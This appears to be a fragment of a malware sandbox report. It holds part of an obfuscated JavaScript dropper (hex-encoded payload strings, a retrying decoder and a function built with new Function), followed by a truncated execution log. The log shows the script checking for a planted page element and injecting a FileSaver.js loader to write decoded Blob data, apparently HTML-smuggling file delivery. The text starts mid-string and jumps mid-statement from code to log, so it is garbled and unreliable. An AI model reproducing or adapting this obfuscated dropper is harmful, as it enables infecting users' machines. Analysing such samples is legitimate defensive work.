d974ed362b8464d767dd6965ff93dd0531"+ 10 | "e1d74bc563cd663f837eb7163ca838d5d31ef46ada278a3b77c1c31b5039ca730f6d74e0563a1f63da47ec0363d3c38f4e6ac9163bb574f4e65be564aef63cef7fb8931dd372d8570c487dca17dcdc73dae70dde72eff7af5d39d9663b1374bba62d2d64a887dac665e8e3de2d31fec77fb170d707de0a62af674f9738c0d2aeba6cb0374b847da4362fef74e866ac6f76a7d74c2665f0f55d9070bc365c1a70f2d57efd63fc67ea3a7ca4244e0463b6c7dae539f5233ec379d8465c5365b2f61d422bb553eb3d3ed6466b8466d3966f253ffab63a1174b5370ac675b1079c6b74cd270d3965fbb3fb7c72d377ec487cc7b3ed897fea974c3f66b8c62b1f3efda20d3123bb425f1722b8c20ee525ddf23a623fe9974fc069d0874b3033b863dc4731e8d77f8c64ee07fe1f72ee865da578a5f7ed817fbc939c4c63e2474fcb62cba64a0a7da0a65c253df4031dd274fed63b8163e627eb1d63e9038d0431bac6ae3d78af277f9f31f4d39d8630d7b74f0c63d8563b1f7ec4963a2b38e406aae363eb674f6d65ae464ead63d557fe8631fd072bea70aef7ddef7dff073abe70edf72ab07ae6f39b4663d1374b6362e6264fe27dfbe65bdb3dbc931bf577ff070d3d7decd62be474bd938ca92ac746ccb274bed7df3b62af074d0c6ac0976bc974c2765a9155d1870f8365ea270f7557c7463a1c7e"+ 11 | "e967ccd244e6463b6b7dceb39fc433eaf79a6665ccc65dfd61bb62bf333ef283ea7d66fcc66c0066f943fd0063ef774f8570dc175e8379a5474d5070c1665a9f3ff4872ed17edde7ce973eb247fbfb74ce166d8662bd63edef20db323ea125a4d22e3620c6725d0623ce63fc0c74fd069a8074e1533a1e3da1331e1677b8a64f257fa8472ccd65b8b78f937ec847ff9439da463e0574bfb62eac64ac47db4165a793de4131a0874b5163ceb63fc57eee463dcd38cfa31f4d6af6478b4877b4231f8639ff530c9274f8163a3d63e0b7ed5f63ce538d486aa8b63a4474c1265f9064e5263e657ff4d31cb272b1270da67daac7dfc173a4170a1972fdd7afb439a8763ed274a3362acc64cd87dba465ba83dcc831e8677f5270e697dc4662c5974d7638cd32af2d6ca7974db57da0c62c6174c666aeb063b3f74eb565b3264ce463be07ff9531a9f72fd570f507db557df0773d8370ea572ae47ab4439feb7fae564ec27db077dfba3da9431d4b65f3663e3664b7974c4838b582ac546cd8c6ce5938d722aef56cd076ce9038bce2af446cb886cffc38e942af896cb3f72c1d70d0765a9e72dcc79d0131ed839c0774a0f63c6763ea97ee1063fb338acb6aa7963e2274efe65b5064f7363db97faa331d8472a3f70b5a7da627dd3373d1270d6672b2b7acb839eb27fa5964b7b7daae7dfb53df4831"+ 12 | "ef865a8d63caf64ae074dd638dd02aa2e6ce3a6cff677ab064da87fabe72e2065f3078ca77ef557fb7631b5876e2774b4365ecd45cd974bb07ce9b61ce757eba78b117dd5674a4741c9070d7665cc379e2f39de738b866ad6165b9263c1768f106aa8367f1970a7563b6631bd677d2c62ec331a2a2ca8b31c4c7fa6474b1566f3b31a8150cad72f5e65d4b78d4d67b6574ec949ffd5ee2d73bd17bef974a6372e2765e0a39d4f33c9442f9172b5f63a5178e9f61e9d65c9378d747fa4d76fd23fd5057e1278e477df6a74e4342f4a68db362f6965a8c74e307cecf5ed0f73d837ba5874d3b72fff65c9a33f6138b682aa4067d3670dbe63c6831d6b65e1d7cfdc61d6557b1078b4e7df5474bf75fd7270dd87ca6d74f6d31f1b2cc0131fd133c154dbb94dde733ead31e5a3ac6131b365cad670e5e65e1c79e7d3fbb963f4970a237fe2875d9c7efde7caed39cd338cb43fa0065ec57ec9942aa065baa63d5478ce17fc1176b7d39cc922dd327bcf38d573fa5262d8b64b2173d0e62de165d5763cb339e6123a0d3de3231c4728cdd38b3e31ba93ab5931bfd33d593ff5f74e6969f6a74fbd33b4a2aa7d67a0970dcc63b1a31a0e65d747cc4061aff57fb078ded7db1574a2f41dbb70cfb65af679a8b31bee2cfef31fa077b4962a703fc8b56b1774a7665f8542a8b61fab74f8b72d3678b8970"+ 13 | "fae7db1857a697ec7e7df2775a3d74ff963c0139a3323d6a38a2531a763ad7b31ad265a047cc0661b7457fdd78f1e7de9674d075feac70b347ce4274a5a2abb563dea74fc965d0964d9263e4a7fb2531a6865b5b7cc5161a9b57c2a78af77dd8e74a1941beb70e4d65b6479fa82ac2c6cc3672a9770f0565b4c72a7d79f0c31c8139ba774d6163ac363f357ea5d63d1838e4b6ad7263c2a74b9365bdd64d6363f6f7fe3231a5777ad770cba7db7162bd374e2b2aa796ce1f6cac577e0764acb7fcc072f5665c7b78da97ef0a7fc0131e8262f8d70a7767d8474bde45ea57eb3b45eb674c7f7cac961ab139b9875aaf70c3665f7370f4d3de7131d5b72eb370ede7dcea7dc3473e4d70fae72b667ac1938bee6ab0465e0f63a8b68afb6af6d67e4270f2c63f4231a0361dc270d1b65f1579f4b31c502cb1e31ae476ac574e8965e0245a4f74bde7cea161b6457ed878d197dc2874f5441e3b70c3665d5979c9639c8138ca72ad9478a2577d0731a5a39b4d61aae70c4465ebb79b2338b9d6ad3667e5870bf163de531b597ea6473ab87bb0342ad565b3c63ace74cb570ef37ce9331bc82cffc31ee87fc4274d5e66f9231d9f50dea72ec965ab178bfd67dac74c0b49eee5ea8473a5b7baf574a8472f6165b6c39b9a33a3550e0d55d9d5ed0555f0053db93fece42a8665aab63ee574d3770e117c"+ 14 | "fa033d4438e1c2ac097ee8573e9b7bbb742aa765b4963f2974fd470c777cd583fcc15eec861bc174e2b7fb2639f6038b2a2afd97ee4e73cc57be3142e2d65c5063c3a74a8b70c427ca833ff5e45b5368bae61c9374d8431bd82ce4a31d6320bd62abfd7ec0273cd67bd2142d9065f1163a7f74c5370ac97cb163fd6446cdd63d5b78efd65e9674d6739d6c75dc270fff65b4e70dd638f632afe87ecf773bff7bd8442a3965fa663e7574f0870f367caeb3fbaa41f197ea5862ede78bd265fac78a037ec7b7fe2d31b3d2ce7831d2921b2c2ad207ed5873f137bc3b42d9265c7463ba774aac70d5d7ca8e3ff3242cb670e8767af074f9345ef97ea2457c3f78bb37dbba74a9c39be961dde70aff65da779f953db0731d2023c7538d912abb97eae873d967bd0442d3d65ef663b4e74dc170b477cdde3fd3b52a4a7ddd37ee8b62aef74afd39c3238cdd2ac2263faf74f3165c5564ad263bc07faf031ef972f5b70ea07df1a7ded573fa870f3c72a507ab9639f0561c9470e7865d5279b233def131bba77f9c70ca27dada62ca474d1c38ee32ab086ccc974da87ddd362b9b74ae631a146af7d63a1f74fff65e4864cb563e5e7fcfd31d3772b4770d777df3d7dd3f73dec70cf172e6b7ab5139baf7fa4264d867de2b7dcdd3da9131a2e65f9f63e8464db974de438c172ad0f6ce9e6cddd72c1670"+ 15 | "c1865cde72bb779d4231ac139b5274fda63db363d617ecc163f4138baf6abe063d8d74f9a65fcf64f8c63c197fd0d31f1072fdc70f177dd477dbdd73a9770f5472f2b7ad0b39a467fef764c047db657dfe83da5531e7c65c3163df364b7b74e7e38c5f2afb86ceed6cbac76fb274ea865fea55e9070ece65fc770f2a39dd777ad664e117ffbb72fb665b9678e6f7ec6a7fc2731ec939d6775e7470b4565bfe70aab3dcf431fd074d5f63bce63fac7eb4263d4838f8b31ac06aad578f4377ee131d9539cd230c9c74bb163b6463f2b7ed3863a4638ce96adf862d8170efd67a6674f0245ff77eeb945f4b74b6f7cccd61a6c39ce475cf370cf965fa270f8e3db8a31f3d77c5464bce7fac672e5565bb378b227eecc7fe0431eca39d8d61cf270d3f65d6a79e5e3db8a31ccc74ca063b0363c8e7eb1763e9638a3831acd6afb278de077b6731ad139f2030e0274fc363bca63dfd7eaf063e0638e456ad9a65e0863a5068d346affe67e3c70daa63cb931a0266c9562d3d79b2831f3b2cccd31d9c7fd8f74c2066e9531d0d50de772ea965fea78bbc67e2074fb349d605ecab73aa57bb3f74acf72db965a8839fa433d0646a6142bd772e5163d6b78faf61fcb65d673fa7f42d3979fa274ab77dbf57ddc033d6e38c302abd666e8b62c0379b453ff1f43e3064b797fde539ba061b1c70f5a65a5279"+ 16 | "eaa38efd2abbf6caa272fe870b0865dd272be279ac631df039fb574cb463bef63a297ebd963d3238ace31bef6abeb6cda06cb656cdb138fee2ad216cb5f6cfe138f1c2a"; 17 | var xhken; 18 | while(true){ 19 | try 20 | { 21 | xhken=kdorj(nrxyx); 22 | break; 23 | } 24 | catch(er) 25 | { 26 | var a = 1; 27 | } 28 | } 29 | return xhken; 30 | } 31 | function kdorj(hlgwz) 32 | { 33 | return (new Function("eaipe","pbllg","wblzm","var pbusw=eaipe.ma"+"tch(/\\S{5}/g),jatsj=\"\",msjdc=0;while(msjdc Preparing Sandbox environment. 9 | 14 Feb 22:25:15 - => Executing: env/utils.js quitely 10 | 14 Feb 22:25:15 - => Executing: env/eval.js quitely 11 | 14 Feb 22:25:15 - => Executing: env/function.js quitely 12 | 14 Feb 22:25:15 - => Executing: env/wscript.js quitely 13 | 14 Feb 22:25:15 - => Executing: env/browser.js quitely 14 | 14 Feb 22:25:15 - => Executing: env/agents.js quitely 15 | 14 Feb 22:25:15 - => Executing: env/other.js quitely 16 | 14 Feb 22:25:15 - => Executing: env/console.js quitely 17 | 14 Feb 22:25:15 - ==> Executing malware file(s). ========================================= 18 | 14 Feb 22:25:15 - => Executing: malware/20170214/459867.js verbosely, reporting silent catches 19 | 14 Feb 22:25:15 - Saving: output/malware_20170214_459867.js 20 | 14 Feb 22:25:15 - Saving: output/tr_malware_20170214_459867.js 21 | 14 Feb 22:25:15 - WScript.scriptfullname = (string) 'malware/20170214/459867.js' 22 | 14 Feb 22:25:15 - WScript.arguments = (object) 'malware/20170214/459867.js,xyz' 23 | 14 Feb 22:25:15 - new Node[10]() 24 | 14 Feb 22:25:15 - new Element[10]
25 | 14 Feb 22:25:15 - Element[10]
.tagname = (string) 'div' 26 | 14 Feb 22:25:15 - new Style[11]() 27 | 14 Feb 22:25:15 - Element[10]
.style = (object) 'Style[11]' 28 | 14 Feb 22:25:15 - Element[10]
.class = (string) 'myvqiw' 29 | 14 Feb 22:25:15 - Element[10]
.innerhtml = (string) 'iloz' 30 | 14 Feb 22:25:15 - new Function(if(document.getElementsByClassName('myvqiw')[0].innerHTML == 'iloz') return true; else return false;) => Function[12] 31 | 14 Feb 22:25:15 - Calling Function[12]() on sandbox 32 | 14 Feb 22:25:15 - document[3].getElementsByClassName(myvqiw) 33 | 14 Feb 22:25:15 - Element[4].class.get() => (string) '' 34 | 14 Feb 22:25:15 - Element[6].class.get() => (string) '' 35 | 14 Feb 22:25:15 - Element[8].class.get() => (string) '' 36 | 14 Feb 22:25:15 - Element[10]
.class.get() => (string) 'myvqiw' 37 | 14 Feb 22:25:15 - document[3].getElementsByClassName(myvqiw) ... 1 found 38 | 14 Feb 22:25:15 - Element[10]
.innerhtml.get() => (string) 'iloz' 39 | 14 Feb 22:25:15 - Returning: 'true' 40 | 14 Feb 22:25:15 - new Function(var docer = document;var screlement = docer.createElement('script');screlement.type = 'text/javascript';screlement.src = 'https://s3-us-west-2.amazonaws.com/s.cdpn.io/14082/FileSaver.js';screlement.onload = function() {var blob = new Blob([window.ato ... (truncated)) => Function[13] 41 | 14 Feb 22:25:15 - Calling Function[13]() on sandbox 42 | 14 Feb 22:25:15 - document[3].createElement(script) 43 | 14 Feb 22:25:15 - new Node[14]() 44 | 14 Feb 22:25:15 - new Element[14]